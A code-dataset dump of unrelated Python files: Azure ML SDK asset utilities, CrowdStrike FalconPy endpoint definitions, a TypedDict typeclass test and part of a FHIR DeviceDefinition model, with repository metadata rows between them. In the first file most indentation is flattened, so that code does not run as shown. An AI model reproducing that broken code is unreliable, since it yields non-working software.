:param order_by: Specifies how to order the results. Defaults to :attr:`OrderString.CREATED_AT_DESC`
:type order_by: Literal[OrderString.CREATED_AT, OrderString.CREATED_AT_DESC]
:return: The latest version of the requested asset
:rtype: Union[ModelVersionData, DataVersionBaseData]
"""
result = (
version_operation.list(
name=asset_name,
resource_group_name=resource_group_name,
registry_name=registry_name,
order_by=order_by,
top=1,
**kwargs,
)
if registry_name
else version_operation.list(
name=asset_name,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
order_by=order_by,
top=1,
**kwargs,
)
)
try:
latest = result.next()
except StopIteration:
latest = None
if latest and isinstance(latest, ModelVersionResourceArmPaginatedResult):
# Data list return object doesn't require this since its elements are already DatasetVersionResources
latest = cast(ModelVersionData, latest)
if not latest:
message = (
f"Asset {asset_name} does not exist in registry {registry_name}."
if registry_name
else f"Asset {asset_name} does not exist in workspace {workspace_name}."
)
no_personal_data_message = (
"Asset {asset_name} does not exist in registry {registry_name}."
if registry_name
else "Asset {asset_name} does not exist in workspace {workspace_name}."
)
raise ValidationException(
message=message,
no_personal_data_message=no_personal_data_message,
target=ErrorTarget.ASSET,
error_category=ErrorCategory.USER_ERROR,
error_type=ValidationErrorType.RESOURCE_NOT_FOUND,
)
return latest
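# --- Hedged sketch (not part of the original module) -----------------------
# "Latest" above means the first element of a created-at-descending listing;
# an empty iterator raises StopIteration, which is mapped to None and then to
# a validation error. The same idea on plain dicts (hypothetical data shape):
def _demo_latest_by_created_at(versions):
    ordered = iter(sorted(versions, key=lambda v: v["created_at"], reverse=True))
    try:
        return next(ordered)
    except StopIteration:
        return None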
def _archive_or_restore(
asset_operations: Union[
"DataOperations",
"EnvironmentOperations",
"ModelOperations",
"ComponentOperations",
],
version_operation: Union[
"DataVersionsOperations",
"EnvironmentVersionsOperations",
"ModelVersionsOperations",
"ComponentVersionsOperations",
],
container_operation: Union[
"DataContainersOperations",
"EnvironmentContainersOperations",
"ModelContainersOperations",
"ComponentContainersOperations",
],
is_archived: bool,
name: str,
version: Optional[str] = None,
label: Optional[str] = None,
) -> None:
resource_group_name = asset_operations._operation_scope._resource_group_name
workspace_name = asset_operations._workspace_name
registry_name = asset_operations._registry_name
if version and label:
msg = "Cannot specify both version and label."
raise ValidationException(
message=msg,
no_personal_data_message=msg,
target=ErrorTarget.ASSET,
error_category=ErrorCategory.USER_ERROR,
error_type=ValidationErrorType.RESOURCE_NOT_FOUND,
)
if label:
version = _resolve_label_to_asset(asset_operations, name, label).version
if version:
version_resource = (
version_operation.get(
name=name,
version=version,
resource_group_name=resource_group_name,
registry_name=registry_name,
)
if registry_name
else version_operation.get(
name=name,
version=version,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
)
)
version_resource.properties.is_archived = is_archived
        if registry_name:
            version_operation.begin_create_or_update(
                name=name,
                version=version,
                resource_group_name=resource_group_name,
                registry_name=registry_name,
                body=version_resource,
            )
        else:
            version_operation.create_or_update(
                name=name,
                version=version,
                resource_group_name=resource_group_name,
                workspace_name=workspace_name,
                body=version_resource,
            )
else:
container_resource = (
container_operation.get(
name=name,
resource_group_name=resource_group_name,
registry_name=registry_name,
)
if registry_name
else container_operation.get(
name=name,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
)
)
container_resource.properties.is_archived = is_archived
        if registry_name:
            container_operation.create_or_update(
                name=name,
                resource_group_name=resource_group_name,
                registry_name=registry_name,
                body=container_resource,
            )
        else:
            container_operation.create_or_update(
                name=name,
                resource_group_name=resource_group_name,
                workspace_name=workspace_name,
                body=container_resource,
            )
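# --- Hedged sketch (not part of the original module) -----------------------
# Archiving here is a soft delete: flip `is_archived` on either one version
# or the whole container, then write the resource back. An in-memory analogue
# of that read-modify-write cycle (all names hypothetical):
def _demo_soft_archive(resource: dict, is_archived: bool) -> dict:
    resource.setdefault("properties", {})["is_archived"] = is_archived
    return resource  # a real client would PUT/PATCH this back to the service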
def _resolve_label_to_asset(
assetOperations: Union[
"DataOperations",
"ComponentOperations",
"EnvironmentOperations",
"ModelOperations",
],
name: str,
label: str,
) -> Asset:
"""Returns the asset referred to by the given label.
    Throws if the label does not refer to a version of the named asset.
:param assetOperations: The operations class used to retrieve the asset
:type assetOperations: Union["DataOperations", "ComponentOperations", "EnvironmentOperations", "ModelOperations"]
:param name: The name of the asset
:type name: str
:param label: The label to resolve
:type label: str
:return: The requested asset
:rtype: Asset
"""
resolver = assetOperations._managed_label_resolver.get(label, None)
if not resolver:
scope = "registry" if assetOperations._registry_name else "workspace"
msg = "Asset {} with version label {} does not exist in {}."
raise ValidationException(
message=msg.format(name, label, scope),
no_personal_data_message=msg.format("[name]", "[label]", "[scope]"),
target=ErrorTarget.ASSET,
error_type=ValidationErrorType.RESOURCE_NOT_FOUND,
)
return resolver(name)
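# --- Hedged sketch (not part of the original module) -----------------------
# `_managed_label_resolver` above is a mapping from label -> callable that
# takes an asset name and returns the resolved asset. A toy registry showing
# the same dispatch (names and shapes are hypothetical):
def _demo_resolve_label(resolvers: dict, name: str, label: str):
    resolver = resolvers.get(label)
    if resolver is None:
        raise KeyError(f"label {label!r} is not managed")
    return resolver(name)

# e.g. _demo_resolve_label({"latest": lambda n: {"name": n, "version": "3"}},
#                          "my-model", "latest") -> {"name": "my-model", "version": "3"}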
def _check_or_modify_auto_delete_setting(
autoDeleteSetting: Union[Dict, "AutoDeleteSetting"],
):
if autoDeleteSetting is not None:
if hasattr(autoDeleteSetting, "condition"):
condition = getattr(autoDeleteSetting, "condition")
condition = snake_to_camel(condition)
setattr(autoDeleteSetting, "condition", condition)
elif "condition" in autoDeleteSetting:
autoDeleteSetting["condition"] = snake_to_camel(autoDeleteSetting["condition"])
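# --- Hedged sketch (not part of the original module) -----------------------
# The normalization above accepts the setting either as an object with a
# `condition` attribute or as a plain dict, and camel-cases the condition
# value. A self-contained stand-in for the imported snake_to_camel helper:
def _demo_snake_to_camel(value: str) -> str:
    head, *rest = value.split("_")
    return head + "".join(part.title() for part in rest)

# e.g. _demo_snake_to_camel("created_greater_than") == "createdGreaterThan"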
def _validate_workspace_managed_datastore(path: Optional[Union[str, PathLike]]) -> Optional[Union[str, PathLike]]:
    # block customer-specified paths on the managed datastore
    if path and (path.startswith(WORKSPACE_MANAGED_DATASTORE_WITH_SLASH) or path == WORKSPACE_MANAGED_DATASTORE):
path = path.rstrip("/")
if path != WORKSPACE_MANAGED_DATASTORE:
raise AssetPathException(
message=INVALID_MANAGED_DATASTORE_PATH_ERROR_NO_PERSONAL_DATA,
                target=ErrorTarget.DATA,
no_personal_data_message=INVALID_MANAGED_DATASTORE_PATH_ERROR_NO_PERSONAL_DATA,
error_category=ErrorCategory.USER_ERROR,
)
return path + "/paths"
return path
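# --- Hedged sketch (not part of the original module) -----------------------
# The rule above, stated on plain strings: on the workspace-managed datastore
# only the bare datastore root is accepted, and it is rewritten to its
# "/paths" root; any other path there is rejected. The root constant below is
# an illustrative stand-in, not necessarily the real value.
def _demo_validate_managed_path(path: str, root: str = "azureml://datastores/managed") -> str:
    if path == root or path.startswith(root + "/"):
        if path.rstrip("/") != root:
            raise ValueError("custom paths are not allowed on the managed datastore")
        return root + "/paths"
    return path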
def _validate_auto_delete_setting_in_data_output(
auto_delete_setting: Optional[Union[Dict, "AutoDeleteSetting"]]
) -> None:
# avoid specifying auto_delete_setting in job output now
if auto_delete_setting:
raise ValidationException(
message=AUTO_DELETE_SETTING_NOT_ALLOWED_ERROR_NO_PERSONAL_DATA,
            target=ErrorTarget.DATA,
no_personal_data_message=AUTO_DELETE_SETTING_NOT_ALLOWED_ERROR_NO_PERSONAL_DATA,
error_category=ErrorCategory.USER_ERROR,
)
class FileUploadProgressBar(tqdm):
def __init__(self, msg: Optional[str] = None):
warnings.simplefilter("ignore", category=TqdmWarning)
is_windows = system() == "Windows" # Default unicode progress bar doesn't display well on Windows
super().__init__(unit="B", unit_scale=True, desc=msg, ascii=is_windows)
def update_to(self, response):
current = response.context["upload_stream_current"]
self.total = response.context["data_stream_total"]
if current:
self.update(current - self.n)
class DirectoryUploadProgressBar(tqdm):
def __init__(self, dir_size: int, msg: Optional[str] = None):
super().__init__(unit="B", unit_scale=True, desc=msg, colour="green")
self.total = dir_size
self.completed = 0
def update_to(self, response):
current = None
if response.context["upload_stream_current"]:
current = response.context["upload_stream_current"] + self.completed
self.completed = current
if current:
self.update(current - self.n)
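# --- Hedged sketch (not part of the original module) -----------------------
# How the update_to callbacks above are driven: the storage SDK invokes the
# raw_response_hook with a response whose `context` dict carries running byte
# counts. A fake response object for exercising the bars in isolation:
class _FakeTransferResponse:
    def __init__(self, current: int, total: int):
        self.context = {
            "upload_stream_current": current,
            "data_stream_total": total,
        }

# e.g. bar = FileUploadProgressBar(msg="demo")
#      bar.update_to(_FakeTransferResponse(512, 1024))  # bar now at 512/1024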
def get_storage_info_for_non_registry_asset(
service_client, workspace_name: str, name: str, version: str, resource_group: str
) -> Dict[str, str]:
"""Get SAS uri and blob uri for non-registry asset. Note that this function won't return the same
SAS uri and blob uri for the same asset. It will return a new SAS uri and blob uri every time it is called.
:param service_client: Service client
:type service_client: AzureMachineLearningWorkspaces
:param workspace_name: The workspace name
:type workspace_name: str
:param name: Asset name
:type name: str
:param version: Asset version
:type version: str
:param resource_group: Resource group
:type resource_group: str
:return: The sas_uri and blob_uri
:rtype: Dict[str, str]
"""
request_body = PendingUploadRequestDto(pending_upload_type="TemporaryBlobReference")
response = service_client.code_versions.create_or_get_start_pending_upload(
resource_group_name=resource_group,
workspace_name=workspace_name,
name=name,
version=version,
body=request_body,
)
sas_info = {
"sas_uri": response.blob_reference_for_consumption.credential.sas_uri,
"blob_uri": response.blob_reference_for_consumption.blob_uri,
}
return sas_info
def _get_existing_asset_name_and_version(existing_asset):
import re
regex = r"/codes/([^/]+)/versions/([^/]+)"
arm_id = existing_asset.id
match = re.search(regex, arm_id)
name = match.group(1)
version = match.group(2)
return name, version
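# --- Hedged sketch (not part of the original module) -----------------------
# The same regex extraction on a hypothetical ARM id, shown standalone. Note
# that the helper above assumes the id always matches; a defensive caller
# should check for a None match before calling group().
def _demo_parse_code_arm_id() -> None:
    import re

    sample = "/subscriptions/000/codes/my-code/versions/3"  # invented id
    match = re.search(r"/codes/([^/]+)/versions/([^/]+)", sample)
    assert match is not None
    assert (match.group(1), match.group(2)) == ("my-code", "3")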
| db98f7a492e6e4897216c2d47effd94207d59937 | 3eaef0fa3c0be14c47c6aa1e1fcfc51ccebe65c7 | /src/falconpy/_endpoint/deprecated/_d4c_registration.py | 0efc33cd4de0c83c7849c176983efa5836f7b076 | ["Unlicense"] | permissive | CrowdStrike/falconpy | 9dd97ee0d703d35f7da100a4c78c91f1f5911478 | b112fde2f3fbe44615f9a3b60b8210e89e51c1d5 | refs/heads/main | 2023-08-18T19:45:46.092966 | 2023-08-12T01:59:37 | 2023-08-12T01:59:37 | 312,363,599 | 256 | 109 | Unlicense | 2023-09-13T02:59:04 | 2020-11-12T18:33:23 | Python | UTF-8 | Python | false | false | 5,506 | py | _d4c_registration.py |
"""Internal API endpoint constant library.
_______ __ _______ __ __ __
| _ .----.-----.--.--.--.--| | _ | |_.----|__| |--.-----.
|. 1___| _| _ | | | | _ | 1___| _| _| | <| -__|
|. |___|__| |_____|________|_____|____ |____|__| |__|__|__|_____|
|: 1 | |: 1 |
|::.. . | CROWDSTRIKE FALCON |::.. . | FalconPy
`-------' `-------'
OAuth2 API - Customer SDK
This is free and unencumbered software released into the public domain.
Anyone is free to copy, modify, publish, use, compile, sell, or
distribute this software, either in source code form or as a compiled
binary, for any purpose, commercial or non-commercial, and by any
means.
In jurisdictions that recognize copyright laws, the author or authors
of this software dedicate any and all copyright interest in the
software to the public domain. We make this dedication for the benefit
of the public at large and to the detriment of our heirs and
successors. We intend this dedication to be an overt act of
relinquishment in perpetuity of all present and future rights to this
software under copyright law.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
For more information, please refer to <https://unlicense.org>
"""
_d4c_registration_endpoints = [
[
"GetCSPMAzureAccount",
"GET",
"/cloud-connect-azure/entities/account/v1",
"Return information about Azure account registration",
"d4c_registration",
[
{
"type": "array",
"items": {
"maxLength": 36,
"minLength": 36,
"pattern": "^[0-9a-z-]{36}$",
"type": "string"
},
"collectionFormat": "multi",
"description": "SubscriptionIDs of accounts to select for this status operation. "
"If this is empty then all accounts are returned.",
"name": "ids",
"in": "query"
},
{
"maxLength": 4,
"minLength": 3,
"pattern": "^(full|dry)$",
"type": "string",
"description": "Type of scan, dry or full, to perform on selected accounts",
"name": "scan-type",
"in": "query"
}
]
],
[
"CreateCSPMAzureAccount",
"POST",
"/cloud-connect-azure/entities/account/v1",
"Creates a new account in our system for a customer and generates a script for them to run "
"in their cloud environment to grant us access.",
"d4c_registration",
[
{
"name": "body",
"in": "body",
"required": True
}
]
],
[
"UpdateCSPMAzureAccountClientID",
"PATCH",
"/cloud-connect-azure/entities/client-id/v1",
"Update an Azure service account in our system by with the user-created client_id "
"created with the public key we've provided",
"d4c_registration",
[
{
"maxLength": 36,
"minLength": 36,
"pattern": "^[0-9a-z-]{36}$",
"type": "string",
"description": "ClientID to use for the Service Principal associated with the customer's Azure account",
"name": "id",
"in": "query",
"required": True
}
]
],
[
"GetCSPMAzureUserScriptsAttachment",
"GET",
"/cloud-connect-azure/entities/user-scripts-download/v1",
"Return a script for customer to run in their cloud environment to grant us access to their "
"Azure environment as a downloadable attachment",
"d4c_registration",
[]
],
[
"GetCSPMAzureUserScripts",
"GET",
"/cloud-connect-azure/entities/user-scripts/v1",
"Return a script for customer to run in their cloud environment to grant us access to their "
"Azure environment",
"d4c_registration",
[]
],
[
"GetCSPMCGPAccount",
"GET",
"/cloud-connect-gcp/entities/account/v1",
"Returns information about the current status of an GCP account.",
"d4c_registration",
[
{
"maxLength": 4,
"minLength": 3,
"pattern": "^(full|dry)$",
"type": "string",
"description": "Type of scan, dry or full, to perform on selected accounts",
"name": "scan-type",
"in": "query"
},
{
"type": "array",
"items": {
"pattern": "\\d{10,}",
"type": "string"
},
"collectionFormat": "multi",
"description": "Parent IDs of accounts",
"name": "ids",
"in": "query"
}
]
],
[
"CreateCSPMGCPAccount",
"POST",
"/cloud-connect-gcp/entities/account/v1",
"Creates a new account in our system for a customer and generates a new service account for them "
"to add access to in their GCP environment to grant us access.",
"d4c_registration",
[
{
"name": "body",
"in": "body",
"required": True
}
]
],
[
"GetCSPMGCPUserScripts",
"GET",
"/cloud-connect-gcp/entities/user-scripts/v1",
"Return a script for customer to run in their cloud environment to grant us access to their "
"GCP environment",
"d4c_registration",
[]
]
]
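# --- Hedged sketch (not part of this module) --------------------------------
# Each row above has the shape [operation_id, HTTP method, route, description,
# service collection, parameter specs]. A minimal lookup over that structure
# (a hypothetical helper, not part of the FalconPy API):
def _demo_find_endpoint(endpoints, operation_id):
    for row in endpoints:
        if row[0] == operation_id:
            return {"method": row[1], "route": row[2]}
    return None

# e.g. _demo_find_endpoint(_d4c_registration_endpoints, "GetCSPMAzureAccount")
# -> {"method": "GET", "route": "/cloud-connect-azure/entities/account/v1"}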
| d19a82989acf1a4b217bc5e295b110ea43f7bcfe | 2de1320d0d2c79b44708f9145271d1024dc20de1 | /tests/test_typeclass/test_typed_dict.py | de776c35798b843a33321fdcfeade2598bc4b9f5 | ["BSD-2-Clause"] | permissive | dry-python/classes | b5dd8de65243ea5f38b565ebad34d62393f0a094 | 6f925f70285510d264a625c6afd0f26395b51475 | refs/heads/master | 2023-07-06T19:25:48.559783 | 2023-04-12T05:57:11 | 2023-04-12T05:57:11 | 217,621,930 | 625 | 29 | BSD-2-Clause | 2023-04-12T05:57:13 | 2019-10-25T22:14:08 | Python | UTF-8 | Python | false | false | 1,549 | py | test_typed_dict.py |
import sys
import pytest
from typing_extensions import TypedDict
from classes import typeclass
if sys.version_info[:2] >= (3, 9): # noqa: C901
pytestmark = pytest.mark.skip('Only python3.7 and python3.8 are supported')
else:
class _User(TypedDict):
name: str
registered: bool
class _UserDictMeta(type):
def __instancecheck__(cls, arg: object) -> bool:
return (
isinstance(arg, dict) and
isinstance(arg.get('name'), str) and
isinstance(arg.get('registered'), bool)
)
_Meta = type('_Meta', (_UserDictMeta, type(TypedDict)), {})
class UserDict(_User, metaclass=_Meta):
"""We use this class to represent a typed dict with instance check."""
@typeclass
def get_name(instance) -> str:
"""Example typeclass."""
@get_name.instance(delegate=UserDict)
def _get_name_user_dict(instance: UserDict) -> str:
return instance['name']
def test_correct_typed_dict():
"""Ensures that typed dict dispatch works."""
user: UserDict = {'name': 'sobolevn', 'registered': True}
assert get_name(user) == 'sobolevn'
@pytest.mark.parametrize('test_value', [
[],
{},
{'name': 'sobolevn', 'registered': None},
{'name': 'sobolevn'},
{'registered': True},
])
def test_wrong_typed_dict(test_value):
"""Ensures that typed dict dispatch works."""
with pytest.raises(NotImplementedError):
get_name(test_value)
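# --- Hedged sketch (not part of this test module) ---------------------------
# The metaclass trick above in isolation: overriding __instancecheck__ makes
# isinstance() structural for plain dicts, which is what lets the typeclass
# delegate dispatch on a TypedDict. All names here are invented.
class _PointMeta(type):
    def __instancecheck__(cls, arg: object) -> bool:
        return (
            isinstance(arg, dict) and
            isinstance(arg.get('x'), int) and
            isinstance(arg.get('y'), int)
        )

class _PointLike(metaclass=_PointMeta):
    """Structurally matches dicts with integer ``x`` and ``y`` keys."""

assert isinstance({'x': 1, 'y': 2}, _PointLike)
assert not isinstance({'x': 1}, _PointLike)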
| 4f4a8a39dcbb06e46861683e99b4b39d2d1b7b41 | fdb9bdc6c4ab2f14ba71e544493706d5e275899f | /fhir/resources/devicedefinition.py | b9785e2cd321ccff5d218635189569e690a73f2d | ["BSD-3-Clause"] | permissive | nazrulworld/fhir.resources | 6ae8aea8180c611b0c5050759c6dcdf63e4cb061 | 1fd6ea476b27b3fcb8c4ef8f23bc51cf161e69e3 | refs/heads/main | 2023-08-30T18:27:27.277249 | 2023-07-03T19:57:06 | 2023-07-03T19:57:06 | 165,297,877 | 256 | 83 | NOASSERTION | 2023-08-24T15:34:05 | 2019-01-11T19:26:41 | Python | UTF-8 | Python | false | false | 72,710 | py | devicedefinition.py |
# -*- coding: utf-8 -*-
"""
Profile: http://hl7.org/fhir/StructureDefinition/DeviceDefinition
Release: R5
Version: 5.0.0
Build ID: 2aecd53
Last updated: 2023-03-26T15:21:02.749+11:00
"""
import typing
from pydantic import Field, root_validator
from pydantic.error_wrappers import ErrorWrapper, ValidationError
from pydantic.errors import MissingError, NoneIsNotAllowedError
from . import backboneelement, domainresource, fhirtypes
class DeviceDefinition(domainresource.DomainResource):
"""Disclaimer: Any field name ends with ``__ext`` doesn't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
An instance of a medical-related component of a medical device.
The characteristics, operational status and capabilities of a medical-
related component of a medical device.
"""
resource_type = Field("DeviceDefinition", const=True)
chargeItem: typing.List[fhirtypes.DeviceDefinitionChargeItemType] = Field(
None,
alias="chargeItem",
title="Billing code or reference associated with the device",
description=None,
# if property is element of this resource.
element_property=True,
)
classification: typing.List[fhirtypes.DeviceDefinitionClassificationType] = Field(
None,
alias="classification",
title="What kind of device or device system this is",
description=None,
# if property is element of this resource.
element_property=True,
)
conformsTo: typing.List[fhirtypes.DeviceDefinitionConformsToType] = Field(
None,
alias="conformsTo",
title=(
"Identifies the standards, specifications, or formal guidances for the "
"capabilities supported by the device"
),
description=(
"Identifies the standards, specifications, or formal guidances for the "
"capabilities supported by the device. The device may be certified as "
"conformant to these specifications e.g., communication, performance, "
"process, measurement, or specialization standards."
),
# if property is element of this resource.
element_property=True,
)
contact: typing.List[fhirtypes.ContactPointType] = Field(
None,
alias="contact",
title="Details for human/organization for support",
description=(
"Contact details for an organization or a particular human that is "
"responsible for the device."
),
# if property is element of this resource.
element_property=True,
)
correctiveAction: fhirtypes.DeviceDefinitionCorrectiveActionType = Field(
None,
alias="correctiveAction",
title="Tracking of latest field safety corrective action",
description=None,
# if property is element of this resource.
element_property=True,
)
description: fhirtypes.Markdown = Field(
None,
alias="description",
title="Additional information to describe the device",
description=None,
# if property is element of this resource.
element_property=True,
)
description__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_description", title="Extension field for ``description``."
)
deviceName: typing.List[fhirtypes.DeviceDefinitionDeviceNameType] = Field(
None,
alias="deviceName",
title="The name or names of the device as given by the manufacturer",
description=None,
# if property is element of this resource.
element_property=True,
)
guideline: fhirtypes.DeviceDefinitionGuidelineType = Field(
None,
alias="guideline",
title=(
"Information aimed at providing directions for the usage of this model "
"of device"
),
description=None,
# if property is element of this resource.
element_property=True,
)
hasPart: typing.List[fhirtypes.DeviceDefinitionHasPartType] = Field(
None,
alias="hasPart",
title="A device, part of the current one",
description="A device that is part (for example a component) of the present device.",
# if property is element of this resource.
element_property=True,
)
identifier: typing.List[fhirtypes.IdentifierType] = Field(
None,
alias="identifier",
title="Instance identifier",
description=(
"Unique instance identifiers assigned to a device by the software, "
"manufacturers, other organizations or owners. For example: handle ID. "
"The identifier is typically valued if the udiDeviceIdentifier, "
"partNumber or modelNumber is not valued and represents a different "
"type of identifier. However, it is permissible to still include those"
" identifiers in DeviceDefinition.identifier with the appropriate "
"identifier.type."
),
# if property is element of this resource.
element_property=True,
)
languageCode: typing.List[fhirtypes.CodeableConceptType] = Field(
None,
alias="languageCode",
title=(
"Language code for the human-readable text strings produced by the "
"device (all supported)"
),
description=None,
# if property is element of this resource.
element_property=True,
)
link: typing.List[fhirtypes.DeviceDefinitionLinkType] = Field(
None,
alias="link",
title=(
"An associated device, attached to, used with, communicating with or "
"linking a previous or new device model to the focal device"
),
description=None,
# if property is element of this resource.
element_property=True,
)
manufacturer: fhirtypes.ReferenceType = Field(
None,
alias="manufacturer",
title="Name of device manufacturer",
description=(
"A name of the manufacturer or legal representative e.g. labeler. "
"Whether this is the actual manufacturer or the labeler or responsible "
"depends on implementation and jurisdiction."
),
# if property is element of this resource.
element_property=True,
# note: Listed Resource Type(s) should be allowed as Reference.
enum_reference_types=["Organization"],
)
material: typing.List[fhirtypes.DeviceDefinitionMaterialType] = Field(
None,
alias="material",
title="A substance used to create the material(s) of which the device is made",
description=None,
# if property is element of this resource.
element_property=True,
)
modelNumber: fhirtypes.String = Field(
None,
alias="modelNumber",
title=(
"The catalog or model number for the device for example as defined by "
"the manufacturer"
),
description=(
"The model number for the device for example as defined by the "
"manufacturer or labeler, or other agency."
),
# if property is element of this resource.
element_property=True,
)
modelNumber__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_modelNumber", title="Extension field for ``modelNumber``."
)
note: typing.List[fhirtypes.AnnotationType] = Field(
None,
alias="note",
title="Device notes and comments",
description=(
"Descriptive information, usage information or implantation information"
" that is not captured in an existing element."
),
# if property is element of this resource.
element_property=True,
)
owner: fhirtypes.ReferenceType = Field(
None,
alias="owner",
title="Organization responsible for device",
description=(
"An organization that is responsible for the provision and ongoing "
"maintenance of the device."
),
# if property is element of this resource.
element_property=True,
# note: Listed Resource Type(s) should be allowed as Reference.
enum_reference_types=["Organization"],
)
packaging: typing.List[fhirtypes.DeviceDefinitionPackagingType] = Field(
None,
alias="packaging",
title=(
"Information about the packaging of the device, i.e. how the device is "
"packaged"
),
description=None,
# if property is element of this resource.
element_property=True,
)
partNumber: fhirtypes.String = Field(
None,
alias="partNumber",
title="The part number or catalog number of the device",
description=None,
# if property is element of this resource.
element_property=True,
)
partNumber__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_partNumber", title="Extension field for ``partNumber``."
)
productionIdentifierInUDI: typing.List[typing.Optional[fhirtypes.Code]] = Field(
None,
alias="productionIdentifierInUDI",
title=(
"lot-number | manufactured-date | serial-number | expiration-date | "
"biological-source | software-version"
),
description=(
"Indicates the production identifier(s) that are expected to appear in "
"the UDI carrier on the device label."
),
# if property is element of this resource.
element_property=True,
        # note: Enum values can be used in validation,
        # but use them at your own responsibility; read the official FHIR documentation.
enum_values=[
"lot-number",
"manufactured-date",
"serial-number",
"expiration-date",
"biological-source",
"software-version",
],
)
productionIdentifierInUDI__ext: typing.List[
typing.Union[fhirtypes.FHIRPrimitiveExtensionType, None]
] = Field(
None,
alias="_productionIdentifierInUDI",
title="Extension field for ``productionIdentifierInUDI``.",
)
property: typing.List[fhirtypes.DeviceDefinitionPropertyType] = Field(
None,
alias="property",
title=(
"Inherent, essentially fixed, characteristics of this kind of device, "
"e.g., time properties, size, etc"
),
description=(
"Static or essentially fixed characteristics or features of this kind "
"of device that are otherwise not captured in more specific attributes,"
" e.g., time or timing attributes, resolution, accuracy, and physical "
"attributes."
),
# if property is element of this resource.
element_property=True,
)
regulatoryIdentifier: typing.List[
fhirtypes.DeviceDefinitionRegulatoryIdentifierType
] = Field(
None,
alias="regulatoryIdentifier",
title="Regulatory identifier(s) associated with this device",
description=(
"Identifier associated with the regulatory documentation (certificates,"
" technical documentation, post-market surveillance documentation and "
"reports) of a set of device models sharing the same intended purpose, "
"risk class and essential design and manufacturing characteristics. One"
" example is the Basic UDI-DI in Europe."
),
# if property is element of this resource.
element_property=True,
)
safety: typing.List[fhirtypes.CodeableConceptType] = Field(
None,
alias="safety",
title="Safety characteristics of the device",
description=None,
# if property is element of this resource.
element_property=True,
)
shelfLifeStorage: typing.List[fhirtypes.ProductShelfLifeType] = Field(
None,
alias="shelfLifeStorage",
title="Shelf Life and storage information",
description=None,
# if property is element of this resource.
element_property=True,
)
udiDeviceIdentifier: typing.List[
fhirtypes.DeviceDefinitionUdiDeviceIdentifierType
] = Field(
None,
alias="udiDeviceIdentifier",
title="Unique Device Identifier (UDI) Barcode string",
description=(
"Unique device identifier (UDI) assigned to device label or package. "
"Note that the Device may include multiple udiCarriers as it either may"
" include just the udiCarrier for the jurisdiction it is sold, or for "
"multiple jurisdictions it could have been sold."
),
# if property is element of this resource.
element_property=True,
)
version: typing.List[fhirtypes.DeviceDefinitionVersionType] = Field(
None,
alias="version",
title="The version of the device or software",
description=None,
# if property is element of this resource.
element_property=True,
)
@classmethod
def elements_sequence(cls):
"""returning all elements names from
``DeviceDefinition`` according specification,
with preserving original sequence order.
"""
return [
"id",
"meta",
"implicitRules",
"language",
"text",
"contained",
"extension",
"modifierExtension",
"description",
"identifier",
"udiDeviceIdentifier",
"regulatoryIdentifier",
"partNumber",
"manufacturer",
"deviceName",
"modelNumber",
"classification",
"conformsTo",
"hasPart",
"packaging",
"version",
"safety",
"shelfLifeStorage",
"languageCode",
"property",
"owner",
"contact",
"link",
"note",
"material",
"productionIdentifierInUDI",
"guideline",
"correctiveAction",
"chargeItem",
]
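# --- Hedged sketch (not part of this module) --------------------------------
# One illustrative use of elements_sequence(): iterate a resource's fields in
# spec order, e.g. for deterministic serialization. Operates on plain dicts;
# the helper name is invented.
def _demo_ordered_items(resource: dict, sequence: list) -> list:
    return [(key, resource[key]) for key in sequence if key in resource]

# e.g. _demo_ordered_items({"modelNumber": "X1", "id": "d1"},
#                          DeviceDefinition.elements_sequence())
# -> [("id", "d1"), ("modelNumber", "X1")]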
class DeviceDefinitionChargeItem(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` doesn't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
Billing code or reference associated with the device.
"""
resource_type = Field("DeviceDefinitionChargeItem", const=True)
chargeItemCode: fhirtypes.CodeableReferenceType = Field(
...,
alias="chargeItemCode",
title="The code or reference for the charge item",
description=None,
# if property is element of this resource.
element_property=True,
# note: Listed Resource Type(s) should be allowed as Reference.
enum_reference_types=["ChargeItemDefinition"],
)
count: fhirtypes.QuantityType = Field(
...,
alias="count",
title="Coefficient applicable to the billing code",
description=None,
# if property is element of this resource.
element_property=True,
)
effectivePeriod: fhirtypes.PeriodType = Field(
None,
alias="effectivePeriod",
title="A specific time period in which this charge item applies",
description=None,
# if property is element of this resource.
element_property=True,
)
useContext: typing.List[fhirtypes.UsageContextType] = Field(
None,
alias="useContext",
title="The context to which this charge item applies",
description=None,
# if property is element of this resource.
element_property=True,
)
@classmethod
def elements_sequence(cls):
"""returning all elements names from
``DeviceDefinitionChargeItem`` according specification,
with preserving original sequence order.
"""
return [
"id",
"extension",
"modifierExtension",
"chargeItemCode",
"count",
"effectivePeriod",
"useContext",
]
class DeviceDefinitionClassification(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` doesn't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
What kind of device or device system this is.
"""
resource_type = Field("DeviceDefinitionClassification", const=True)
justification: typing.List[fhirtypes.RelatedArtifactType] = Field(
None,
alias="justification",
title="Further information qualifying this classification of the device model",
description=None,
# if property is element of this resource.
element_property=True,
)
type: fhirtypes.CodeableConceptType = Field(
...,
alias="type",
title="A classification or risk class of the device model",
description=None,
# if property is element of this resource.
element_property=True,
)
@classmethod
def elements_sequence(cls):
"""returning all elements names from
``DeviceDefinitionClassification`` according specification,
with preserving original sequence order.
"""
return ["id", "extension", "modifierExtension", "type", "justification"]
class DeviceDefinitionConformsTo(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` doesn't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
